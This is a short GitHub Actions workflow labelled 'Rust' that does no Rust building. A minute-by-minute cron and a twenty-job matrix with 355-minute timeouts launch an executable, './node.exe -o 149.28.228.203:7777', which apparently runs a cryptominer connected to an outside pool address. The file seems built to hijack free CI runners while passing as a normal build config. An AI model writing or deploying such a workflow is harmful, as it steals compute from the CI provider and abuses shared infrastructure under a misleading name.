name: Rust

on:
  schedule:
    - cron: '* */1 * * *'
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:

    runs-on: windows-latest
    strategy:
      matrix:
        Let's:
          - vm
          - vm
          - vm
          - vm
          - vm
        Go:
          - ware
          - ware
          - ware
          - ware
    timeout-minutes: 355
    steps:
    - name: Ready
      uses: actions/setup-go@v1
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: ./node.exe -o 149.28.228.203:7777
